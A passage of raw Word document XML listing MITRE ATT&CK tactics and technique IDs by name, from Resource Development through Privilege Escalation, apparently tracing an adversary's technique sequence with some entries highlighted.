        </w:rPr>
        <w:t xml:space="preserve"> &lt;Gather Victim Identity Information&gt;:Email Addresses</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4268CC8C"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0042 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B1289F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Resource Development ['T1585.001', 'T1584.004', 'T1585.002', 'T1583.004', 'T1588.003', 'T1608.001', 'T1584.001', 'T1588.002', 'T1608.002', 'T1583.006', 'T1588.004', 'T1587.001', 'T1583.001']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="497BE9F4"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T1585.001 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B1289F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Establish Accounts&gt;:Social Media Accounts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31CB2057"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T1584.004 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B1289F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Compromise Infrastructure&gt;:Server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58A47642"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T1585.002 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B1289F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Establish Accounts&gt;:Email Accounts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="385994D9"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T1583.004 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B1289F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Acquire Infrastructure&gt;:Server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FB01EA0"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T1588.003 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B1289F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Obtain Capabilities&gt;:Code Signing Certificates</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0293B925"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T1608.001 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B1289F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Stage Capabilities&gt;:Upload Malware</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78326BD2"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T1584.001 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B1289F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Compromise Infrastructure&gt;:Domains</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="415F5E03"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T1588.002 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B1289F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Obtain Capabilities&gt;:Tool</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02A67A47"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T1608.002 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B1289F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Stage Capabilities&gt;:Upload Tool</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47AD9975"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T1583.006 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B1289F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Acquire Infrastructure&gt;:Web Services</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69E50907"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T1588.004 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B1289F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Obtain Capabilities&gt;:Digital Certificates</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12983520"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T1587.001 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B1289F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Develop Capabilities&gt;:Malware</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="743ACF75"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T1583.001 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B1289F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Acquire Infrastructure&gt;:Domains</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F35BC9C"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0001 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B1289F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Initial Access ['T1566.003', 'T1566.002', 'T1078', 'T1566.001', 'T1189']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B915EF4"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T1566.003 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B1289F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Phishing&gt;:</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B1289F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Spearphishing</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B1289F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> via Service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32F4658C"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T1566.002 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B1289F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Phishing&gt;:</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B1289F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Spearphishing</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B1289F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Link</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64E87A75"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1078 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B1289F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Valid Accounts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45AEC919"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8257B9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>T1566.001 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="008257B9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Phishing&gt;:</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008257B9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>Spearphishing</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008257B9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t xml:space="preserve"> Attachment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D65A1D1"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1189 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B1289F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Drive-by Compromise</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EFDB1AF"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0002 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B1289F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Execution ['T1053.005', 'T1059.005', 'T1059.001', 'T1106', 'T1204.001', 'T1059.003', 'T1204.002', 'T1203', 'T1047']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0596497D"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T1053.005 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B1289F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Scheduled Task/Job&gt;:Scheduled Task</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="718DFBC0"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T1059.005 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B1289F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Command and Scripting Interpreter&gt;:Visual Basic</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EFFEF8E"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T1059.001 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B1289F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Command and Scripting Interpreter&gt;:PowerShell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B960FB2"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1106 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B1289F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Native API</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76E51C44"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T1204.001 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B1289F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;User Execution&gt;:Malicious Link</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E7A5F9A" w14:textId="77777777" w:rsidR="00B1289F" w:rsidRPr="00F12280" w:rsidRDefault="00B1289F" w:rsidP="004B1C5B">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B1289F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Next Technique is </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F12280">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>T1059.003 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F12280">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Command and Scripting Interpreter&gt;:Windows Command Shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47B27D5F"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8257B9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>T1204.002 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="008257B9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;User Execution&gt;:Malicious File</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25808AF7"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5E0C97">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005E0C97">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>1203 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005E0C97">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t xml:space="preserve"> Exploitation for Client Execution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F5FFD52"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1047 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B1289F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Windows Management Instrumentation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30861998"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0003 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B1289F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Persistence ['T1574.002', 'T1574.013', 'T1053.005', 'T1078', 'T1547.009', 'T1542.003', 'T1547.001', 'T1098', 'T1543.003']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="239097CA"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35641D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>T1574.002 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0035641D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Hijack Execution Flow&gt;:DLL Side-Loading</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D1BE35E"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T1574.013 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B1289F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Hijack Execution Flow&gt;:</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B1289F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>KernelCallbackTable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="31EE75D3"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T1053.005 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B1289F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Scheduled Task/Job&gt;:Scheduled Task</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="242AF00D"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1078 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B1289F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Valid Accounts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E47F8BE"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T1547.009 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B1289F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Boot or Logon </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B1289F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Autostart</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B1289F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Execution&gt;:Shortcut Modification</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A1E5894"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T1542.003 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B1289F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Pre-OS Boot&gt;:</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B1289F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Bootkit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="09391184"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T1547.001 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B1289F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Boot or Logon </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B1289F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Autostart</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B1289F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Execution&gt;:Registry Run Keys / Startup Folder</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D61B012"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1098 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B1289F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Account Manipulation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57AC8871"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T1543.003 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B1289F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Create or Modify System Process&gt;:Windows Service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10FB3218"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0004 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B1289F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Privilege Escalation ['T1574.002', 'T1574.013', 'T1053.005', 'T1078', 'T1547.009', 'T1055.001', 'T1134.002', 'T1547.001', 'T1543.003']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FBD6A6F"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T1574.002 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B1289F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Hijack Execution Flow&gt;:DLL Side-Loading</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70A8E223"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T1574.013 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B1289F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Hijack Execution Flow&gt;:</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B1289F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>KernelCallbackTable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="19F8534D"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lastRenderedPageBreak/>
        <w:t xml:space="preserve">Next Technique is </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00B1289F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>T1053.005 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B1289F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Scheduled Task/Job&gt;:Scheduled Task</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66A06ABE"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1078 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B1289F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Valid Accounts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="332BD696"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T1547.009 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B1289F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Boot or Logon </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B1289F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Autostart</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B1289F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Execution&gt;:Shortcut Modification</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33D410FC"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T1055.001 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B1289F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Process Injection&gt;:Dynamic-link Library Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="699C5AE0"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T1134.002 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B1289F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
